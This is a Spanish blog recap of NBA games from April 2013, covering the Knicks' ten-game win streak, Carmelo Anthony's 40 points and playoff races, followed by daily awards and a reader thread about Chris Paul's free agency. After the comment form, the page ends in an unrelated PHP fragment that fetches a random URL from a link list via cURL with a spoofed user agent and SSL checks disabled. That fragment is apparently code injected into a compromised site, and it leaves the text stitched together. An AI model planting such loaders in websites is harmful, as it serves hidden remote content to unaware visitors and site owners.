La Crónica: ¡10 para Knicks!

04 de April de 2013 por Simon

12 partidos se disputaron ayer en la NBA en los que ninguno de los equipos que se jugaba algo se enfrentaban entre sí. Destacan los 40 puntos de Carmelo, justo después de marcarse 50 contra los Heat, la victoria de Denver en Utah y la  vuelta a la senda de la victoria de Nets y Spurs tras algunos partidos perdiendo.

New York venció a unos peleones Atlanta Hawks de la mano de un estratosférico Carmelo Anthony que encestó una y otra vez en el aro de Atlanta para terminar el partido con 40 puntos. El partido siempre discurrió con ventajas cortas para los Knicks que los Hawks iban limando hasta conseguir el empate e incluso a veces ponerse momentáneamente por delante. En el último cuarto los de la Gran Manzana metieron una marcha más, sobre todo en defensa, y terminaron llevándose el partido sin problemas y completar así una serie de 10 partidos consecutivos ganando que les aúpa al segundo puesto de la conferencia Este (95-82). Los vecinos de los Knicks aprovecharon su vuelta al Este para volver a ganar. Anoche lo hicieron ante los Cleveland Cavaliers que no pusieron apenas trabas. Al descanso, Brooklyn vencía ya por 30 puntos. En la segunda parte los Cavs maquillaron el marcador ante la relajación de Brooklyn que tuvo en Brooks a su máximo anotador con 27 puntos y una nueva exhibición de Reggie Evans que anoche capturó 18 rebotes (113-95). 

En la cabeza del Oeste entraron en liza todos los equipos  en zona de Play Off en ese momento a excepción de los Oklahoma City Thunder que ayer tenían descanso. El partido más interesante era el Denver-Utah. Tras un primer tiempo igualado el partido empezó a romperse en el tercer cuarto en el que Denver consiguió llevar sus ventajas por encima de los dos dígitos lo que a la postre resultó definitivo e inalcanzable para los Jazz. Tras esta derrota Utah pierde su plaza de Play Off por el momento (113-96). Juego muy repartido en Denver, como es habitual, en el que anoche le tocó destacar a Gallinari con 21 puntos. Por su parte, Memphis no dio la más mínima opción a Portland y sigue igualado con los Nuggets. Ya desde el primer cuarto Memphis logró casi sentenciar el partido llevando su ventaja por encima de los 10 puntos, ventaja que no paró de crecer poco a poco hasta llegar al 94-76 con el que terminó el partido. Conley volvió a ser el mejor de Memphis con 20 puntos y 5 asistencias. El último en discordia en esta lucha es Clippers que marcha a dos partidos de diferencia. Ayer tuvieron un partido muy plácido en el que siempre le fueron las cosas de cara y no hubo el más mínimo contratiempo. Los Suns apenas fueron rival para un equipo en el que Paul y Jordan se resarcieron de su nefasto partido anterior con  15 puntos y 12 asistencias para  el base y 20 puntos y 12 rebotes para el pívot (101-126). Al final de partido hubo una tangana ocasionada por un enganchón entre Hollins y Dragic.

El resto de equipos de Play Off en el Oeste también vencieron. San Antonio Spurs lo hizo a domicilio ante Orlando Magic en un partido en el que San Antonio apenas se vio exigido por Orlando a pesar de la buena actitud y disposición de estos (84-98).  Los Spurs salieron al partido concentradísimos para no dar ni un poco de espacio a la sorpresa, pues no podían permitirse perder por tercer encuentro consecutivo. El mejor fue Danny Green con 20 puntos y Duncan apenas jugó 13 minutos. Por su parte, Houston y Golden State siguen su particular lucha por el sexto puesto. Ayer ambos vencieron y lo hicieron de 10 puntos aunque el desarrollo del encuentro fue bien distinto. Houston tuvo siempre el partido controlado a pesar de no disfrutar de grandes ventajas (112-102) mientras que Golden State Warriors remontó una diferencia de 10 puntos gracias a gran segundo cuarto. A partir de ahí el partido se les puso de cara aunque estuvo en el aire hasta el último cuarto en el que los de la bahía fueron mejores y se llevaron el gato al agua (88-98). En los Rockets el rookie Terrence Jones sorprendió a propios y extraños con un doble doble de 14 puntos y 12 rebotes a pesar de no jugar desde el 19 de Diciembre.

En el Este, Boston venció a Detroit (93-98) en otro gran partido de Jeff Green que está marcándose un final de liga regular espectacular. Ayer 34 puntos que dejaron sin recompensa el partidazo de Monroe de 24 puntos y 17 rebotes. Cada vez que un servidor ve jugar a los Wolves no puede dejar de pensar que hubiera sido de este equipo sin contratiempos  ni lesiones. Ayer vencieron a los Bucks (107-98) con grandes partidos de Pekovic con 27 puntos y de Ricky Rubio con 19 puntos, 12 asistencias y 8 robos. Para terminar, dos partidos en los que no había nada en juego. Charlotte venció en casa a los Sixers  (83-88) con 24 puntos de Henderson y Toronto venció  a Wizards (78-88) en el que Valanciunas fue el mejor con un doble-doble de 24 puntos y 10 rebotes.

PREMIOS

MVP: Hace 2 días fueron 50 puntos y ayer 40. Carmelo Anthony entra en racha justo en el momento más importante de la temporada.

Rookie: Jonas Valanciunas está que se sale últimamente. Anoche fueron 24 puntos y 10 rebotes que dejan entrever un gran futuro. Terrence Jones apareció desde el banquillo para aportar 14 puntos y 12 rebotes.

Sorpresa: Los 34 puntos de Jeff Green o los 29 puntos y 12 rebotes de Ersan Ilyasova se merecerían el premio sinó fuera porque Marshon Brooks se fue anoche a los 27 puntos y 7 asistencias al aprovechar la baja de Joe Johnson.

Decepción: Día históricamente negativo para Jrue Holiday. El jugador de los Sixers anotó solo 2 de sus 24 intentos de canasta, uno de los peores porcentajes de acierto de toda la historia de la liga. A favor suyo hay que decir que a pesar de ello “sólo” hizo un -3 de eficiencia.

Esfuerzo en vano: El turco Ersan Ilyasova fue el mejor de los Bucks. Cuando algo así pasa suele ser porque Jennings y Ellis no han funcionado y el equipo de Wisconsin lo ha acabado pagando.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Si al final los Knicks serán un rival digno para los Heat y todo… Veremos si Chandler recupera la forma y si Amaré llega a tiempo de aportar de nuevo.

    Brutal el 2 de 24 de Holiday. Peor que Obama, jeje.

      Citar

  2. Esteban dice:
    #2

    wow los clippers a punto de caer hasta el quinto puesto, sin ventaja de localia nuevamente frente a menphis y con una bajon de rendimiento tan notable desde hace algunos meses, es muy probable su eliminacion en primera ronda

    si esto sucede, se abre una gran puerta para la salida de CP3 cuando hace unos meses parecia seguro que seguiria, y si CP3 es agente libre, que lio se podria armar ehhhh

      Citar

  3. Heineken dice:
    #3

    Los hermanos Holiday ayer se marcaron un 3 de 29, creo que no les dejaron entrar en casa xD

      Citar

  4. rumbero dice:
    #4

      Citar

  5. Simon dice:
    #5

    Esteban:
    wow los clippers a punto de caer hasta el quinto puesto, sin ventaja de localia nuevamente frente a menphis y con una bajon de rendimiento tan notable desde hace algunos meses, es muy probable su eliminacion en primera ronda

    si esto sucede, se abre una gran puerta para la salida de CP3 cuando hace unos meses parecia seguro que seguiria, y si CP3 es agente libre, que lio se podria armar ehhhh

    el tema es que no veo muchos equipos en disposición de firmarlo, con tanto espacio salarial.
    Clippers va a ser cuarto por lo de campeon de division pero practicamente seguro no tendran ventaja de campo en la primera ronda y eso ante Memphis y Denver… es casi un suicidio. Ante Memphis les vería posibilidades pero ante Denver creo que no tendrían demasiado que hacer si tienen el factor campo perdido.

      Citar

  6. Esteban dice:
    #6

    Simon: el tema es que no veo muchosequipos en disposición de firmarlo, con tanto espacio salarial.
    Clippers va a ser cuarto por lo de campeon de division pero practicamente seguro no tendran ventaja de campo en la primera ronda y eso ante Memphis y Denver… es casi un suicidio. Ante Memphis les vería posibilidades pero ante Denver creo que no tendrían demasiado que hacer si tienen el factor campo perdido.

    dallas esta en muy buenas condiciones de firmarlo, lo veo alli junto a dirk

    los suns si mueven algo las piezas podrian estar arranco casi de 0 con el, tanto gracic como gortat tiene muy buen mercado y podrian irse por exepciones, mientras que scola y dudley tienen contratos bajisimos y brown no esta garantizado

    por ultimo los rockets, que si renuncian a delfino, brooks y garcia, podrian tener el mismo equipo de este año pero con cp3 de base titular y lin en plan sexto hombre

      Citar

  7. Esteban dice:
    #7

    o.j. mayo tiene tdas las voletas para ser el futuro sexto hombre de los pacers por lo que he leido por alli

      Citar

  8. Simon dice:
    #8

    Dallas el único. por que de los demás equipos que hay con espacio no creo que Paul ni se interese en cogerles el telefono pues con ninguno tendría mas opciones que en Clippers.

      Citar

  9. Esteban dice:
    #9

    No comparto simon, creo que de aca a dos años los rockets estan mucho mejor qu lso clippers, hardeb tiene mas pasta de mvp q griffin, y tienen un plantel muchisimo mas joven q los clippers, parsons, asik, harden, jones, thomas es uno de los grupos de jovenes ya hechos de la nba

    Los suns hoy no tienen nada, pero vendiendo sus activos, q como dije no estan en mal precio puieden iniciar una reconstrucion total, los morris, marshal y beasley solos, mas pau y con espacio parados jugadores caros mas

      Citar

  10. Esteban dice:
    #10

    Y por otro lado, viendo los lakers, howard, cp3, harford y lou williams podrian ser campeones no?

      Citar

  11. Simon dice:
    #11

    Esteban:
    No comparto simon, creo que de aca a dos años los rockets estan mucho mejor qu lso clippers, hardeb tiene mas pasta de mvp q griffin, y tienen un plantel muchisimo mas joven q los clippers, parsons, asik, harden, jones, thomas es uno de los grupos de jovenes ya hechos de la nba

    Los suns hoy no tienen nada, pero vendiendo sus activos, q como dije no estan en mal precio puieden iniciar una reconstrucion total, los morris, marshal y beasley solos, mas pau y con espacio parados jugadores caros mas

    Pero es que lo de que los Rockets lo podrían firmar es una imaginación tuya. Según mis cuentas ( con los contratos de lin y asik de 8+8+8 ) que tengo entendido que son asi… Rockets no estaría ahora mismo en disposición de dar el máximo a Paul por muy poco si, pero tendrían que deshacerse de jugadores antes… y los Rockets ahora mismo no tienen ningún contrato malo que digas que pueden prescindir de el. Veo mucho mas probable que su prioridad fuera Dwight Howard que Paul. Pero vamos que económicamente puede ser por que la verdad les faltaría poco margen pero no creo que la prioridad de Houston sea Paul… no le veo encajando en esa plantilla.

    LO que dices de los Suns, pues claro que si venden a la mayoria de jugadores y tienen suerte de que muchos equipos les cambien mierdas por buenos jugadores y firman a Paul y convencen a Barkley para que vuelva y lo hace a un buen nivel podrian luchar por el anillo… Es que si los Suns pueden armar a corto plazo un equipo contender entonces podemos decir lo mismo de todos los equipos Bobcats, Raptors, Sacramento o Detroit están tan cerca o mas que Suns de montar equipos contender. POr no hablar de Orlando, NOLA o Washington

      Citar

  12. rumbero dice:
    #12

    Esteban:
    Y por otro lado, viendo los lakers, howard, cp3, harford y lou williams podrian ser campeones no?

    ¿Laker o Hawks? En Atlanta es cierto que tienen a prácticamente todo el roster en último año de contrato, pero de ahí a poder firmar a estos dos por sus +-20 kilos por temporada… ya no se como quedarian a nivel de tope salarial pero aun pudiendo se quedarian con una plantilla muy muy cortita

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>